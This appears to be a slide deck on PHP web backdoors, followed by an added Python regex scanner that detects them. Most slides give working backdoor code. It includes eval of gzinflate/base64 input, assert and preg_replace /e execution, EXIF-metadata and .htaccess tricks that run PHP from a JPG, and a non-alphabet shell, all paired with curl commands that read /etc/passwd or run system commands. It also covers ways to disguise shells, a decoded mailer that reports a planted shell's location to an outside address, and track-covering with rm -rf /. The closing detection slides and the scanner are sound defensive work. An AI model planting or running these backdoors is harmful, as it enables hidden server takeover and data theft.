    Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
    $ curl -d "cat+/etc/passwd" http://target.com/simple-backdoor.php
  • 17. Passing variables to PHP global vars: $_GET $_POST $_COOKIE $_REQUEST $_SERVER['HTTP_CMD']
    Communication
    $ curl -A- -vvv 127.0.0.1/test1.php -H "Accept_Encoding: @system ('uname -a;ps -aux');"
  • 18. base64_decode() + gzinflate()
    1. Encode (Attacker Client)
    $ php -r "echo base64_encode(gzdeflate('system("id")'));"
    K64sLknN1VDKTFHSBAA=
    2. Send (Attacker Client)
    $ curl -A- -vvv 127.0.0.1/test3.php -d "cmd=K64sLknN1VDKTFHSBAA="
    3. Decode (PHP Backdoor)
    @eval(gzinflate(base64_decode($_POST["cmd"])));
    4. Output
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • 19. Code Evaluation besides eval()
    1. assert()
    assert('sys' . 'tem('.$_POST["cmd"].')');
    $ curl -A- -vvv http://target/evil.php -d "cmd='ls -lha'"
    2. preg_replace() with the /e modifier (deprecated in PHP 5.5.0)
    preg_replace('/(.*)/e', base64_decode($_POST["cmd"]), '');
    $ curl -A- -vvv http://target/evil.php -d "cmd=c3lzdGVtKCdpZCcp"
    3. And many more, e.g. OS command execution functions; check out this link:
    http://stackoverflow.com/questions/3115559/exploitable-php-functions
  • 20. Stupid trick, but it works!
    ★ GNU license at the beginning of a PHP file!
    /* Copyright (C) 1991 Free Software Foundation, Inc. This file is part of the GNU C Library. ... */
    <?php ...
    ★ PGP Public Key!?
    /* -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.10 (GNU/Linux) ... */
    <?php ...
    ★ Software license PROHIBITS decoding
    ★ More creative filenames!
    ○ lndex.php ○ 1ndex.php ○ index2.php ○ wp-manual.php ○ cat.jpg.php ○ license.txt ○ README.md ○ .bash_profile
  • 21. PHP: exif_read_data()
    1. Create EXIF metadata using exiftool
    $ exiftool 2600.jpg -Software=system
    $ exiftool 2600.jpg -Model=id
    2. Put 2600.jpg alongside the backdoor
    $A = exif_read_data('2600.jpg');
    $A['Software']($A['Model']);
    3. Browse to the backdoor and boom!
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • 22. .htaccess + any file format
    1. Apache Configuration
    AllowOverride All
    2. .htaccess
    <FilesMatch "2600.jpg">
    SetHandler application/x-httpd-php
    </FilesMatch>
    3. 2600.jpg
    <?php @system($_POST["cmd"]); ?>
  • 23. One-statement PHP backdoor
    <?@$_POST[0]($_POST[1])?>
    $ curl -A- "http://target/backdoor.php" -d "0=system&1=uname+-a"
  • 24. Binary Code in PHP Shell
  • 25. Binary Code in PHP Shell
  • 26. Non-alphabet PHP shell
    <?$_="";$_[+""]='';$_="$_"."";
    $_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>
    <?=${'_'.$_}['_'](${'_'.$_}['__']);?>
    $ curl "http://target/backdoor.php?_=shell_exec&__=uname+-a"
    *** This code contains non-printable characters; it might not work if you copy & paste! ***
  • 27. Common survivor features! Work on various types of OS (win/linux/osx) and ISO?? find writable directory, read/write file, merge into every file, merge into backup db / files / zip, reverse/bind php shell, database client, file management (symlink?), av/ids/ips/waf detection, credential dumper, os command, network scanner, TCP/UDP/HTTP/DNS amp flood, SOCKS proxy for pivoting, HTTP proxy, IRC connect back etc.
  • 29. Free Kiddies Backdoor! c99 r57 wso icfdkshell weevely ASPsh msfpayload. Use at your own risk!
    Caution! There are many cases where a backdoor is served inside another backdoor *w*)a
    e.g. http://packetstormsecurity.com/files/download/117974/wso2.5.1.zip
    $x10="x6dai154";$x0b=$_SERVER["x53x45RVE122_x4eAMx45"].$_SERVER["123103x52Ix50x54_116101115E"];$x0c="141r162a171040".$x0b;$x0d=array("143x61","x6cx69","146x77162151x74x65","100","vx65x2e");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
    Decoded: mail("fwrite@live.ca","target/backdoor.php","target/backdoor.php");
  • 30. Covering Tracks ★ root? ★ logs e.g. /var/log/* ★ history e.g. ~/.bash_history ★ self-destruction ★ rm -rf /
  • 31. Detect / Prevent
    ★ Follow secure coding guidelines
    ★ Security hardening checklists
    ★ Critical file integrity monitoring
    ★ VA / Pentest by certified guys
    ★ Patch management & patch auditing
    ★ Centralized log & WAF?
    $ iptables -A OUTPUT -m string --algo bm --string 'FilesMan' -j DROP
  • 32. MOD_Security?
    var_dump(in_array('mod_security2', apache_get_modules()));
    print_r(apache_get_modules());
  • 33. Clean up
    1. Change/reset passwords
    2. Review log files
    3. Hunt for vulnerable apps/backdoors
    4. Backup || Recovery
    $ grep - common dangerous functions
    $ find
    ★ newly created files
    ★ certain conditions (time/date/permission)
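The detection side of slides 31 and 33, as an added example that is not part of the presentation: a small scanner whose rules mirror the techniques the talk lists (eval/assert, exec functions, gzinflate+base64 chains, preg_replace /e, array-element callables like $_POST[0]($_POST[1]), exif_read_data, hex-escaped strings, PHP in non-PHP files, decoy double extensions and .htaccess handler remapping). The sample tree is constructed inline from fragments quoted on the slides plus one benign file; the rule names, severities and threshold are my own choices, not from the talk.

```python
import re

PHP_EXT = {"php", "phtml", "php5", "inc"}
DECOY_EXT = {"jpg", "jpeg", "png", "gif", "txt", "pdf"}
REQ = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
ESC = r"(?:\\x[0-9a-fA-F]{2}|\\[0-7]{3})"  # "\x6d" / "\154" string escapes (slide 29 style)

# (rule name, severity, pattern); each mirrors a technique shown in the slides.
RULES = [
    ("eval-or-assert", 3, re.compile(r"\b(?:eval|assert)\s*\(")),
    ("exec-function", 3, re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(")),
    ("decode-chain", 3, re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\(\s*@?\s*base64_decode\s*\(")),
    ("preg-replace-e", 3, re.compile(r"preg_replace\s*\(\s*['\"]/.*?/[a-zA-Z]*e[a-zA-Z]*['\"]")),
    ("array-element-callable", 3, re.compile(r"\$(?:\w+|\{[^}]*\})\s*\[[^\]]*\]\s*\(")),  # $_POST[0]($_POST[1])
    ("variable-function-call", 2, re.compile(r"\$\w+\s*\(")),                            # @$x10(...)
    ("hex-obfuscated-string", 2, re.compile(ESC + r".{0,4}?" + ESC)),
    ("exif-read", 1, re.compile(r"\bexif_read_data\s*\(")),
    ("request-input", 1, re.compile(REQ)),
]
HTACCESS_RULES = [
    ("handler-remap", 3, re.compile(r"(?:SetHandler|AddHandler|AddType)\s+application/x-httpd-php", re.I)),
]
PHP_OPEN = re.compile(r"<\?(?:php\b|=|\s|@|\$)")

def scan_file(name, content):
    """Score one file; returns {'name', 'hits': [rule names], 'score': int}."""
    hits, score = [], 0
    base = name.rsplit("/", 1)[-1]
    for rule, sev, pat in (HTACCESS_RULES if base == ".htaccess" else RULES):
        if pat.search(content):
            hits.append(rule); score += sev
    if base != ".htaccess":
        parts = base.split(".")
        ext = parts[-1].lower() if len(parts) > 1 else ""
        if ext not in PHP_EXT and PHP_OPEN.search(content):  # PHP hidden in license.txt, 2600.jpg ...
            hits.append("php-in-non-php-file"); score += 3
        if len(parts) > 2 and ext in PHP_EXT and parts[-2].lower() in DECOY_EXT:  # cat.jpg.php
            hits.append("double-extension"); score += 2
    return {"name": name, "hits": hits, "score": score}

def scan_tree(files, threshold=3):
    """Scan a {path: content} map; return files scoring >= threshold, highest first."""
    results = [scan_file(n, c) for n, c in files.items()]
    return sorted((r for r in results if r["score"] >= threshold), key=lambda r: -r["score"])

# Constructed sample tree: one benign file plus the fragments quoted on the slides.
SAMPLES = {
    "site/index.php": "<?php\nrequire 'config.php';\necho htmlspecialchars($_GET['q'] ?? '');\n",
    "site/simple-backdoor.php": "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); die(); } ?>",
    "site/test3.php": '<?php @eval(gzinflate(base64_decode($_POST["cmd"]))); ?>',
    "site/evil.php": "<?php preg_replace('/(.*)/e', base64_decode($_POST[\"cmd\"]), ''); ?>",
    "site/backdoor.php": "<?@$_POST[0]($_POST[1])?>",
    "site/img/2600.jpg": '<?php @system($_POST["cmd"]); ?>',
    "site/img/.htaccess": '<FilesMatch "2600.jpg">\nSetHandler application/x-httpd-php\n</FilesMatch>\n',
    "site/license.txt": "/* GNU GPL ... */\n<?php $A = exif_read_data('2600.jpg'); $A['Software']($A['Model']); ?>",
    "site/uploads/cat.jpg.php": '<?php @system($_POST["cmd"]); ?>',
    "site/wso.php": '<?php $x10="\\x6dai\\154"; $x0f=@$x10($x0e,$x0c,$x0b); ?>',
}
```

To use it on a real webroot, build the dict by walking the tree and pass it to scan_tree(); combine the hits with the find-by-mtime check from slide 33, since a freshly modified file that also scores here is the first thing to pull for review.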
  • 34. Practical Hacking?
    Capture The Flag: https://ctftime.org/
    Online challenges:
    http://www.root-me.org/en/Challenges/
    http://wargame2k10.nuitduhack.com/
    http://captf.com/practice-ctf/
    http://www.overthewire.org/wargames/natas/
    http://www.modsecurity.org/demo/
    VM Labs:
    http://blog.g0tmi1k.com/2011/03/vulnerable-by-design.html
    https://pentesterlab.com/exercises/
    http://vulnhub.com/
    Thank You!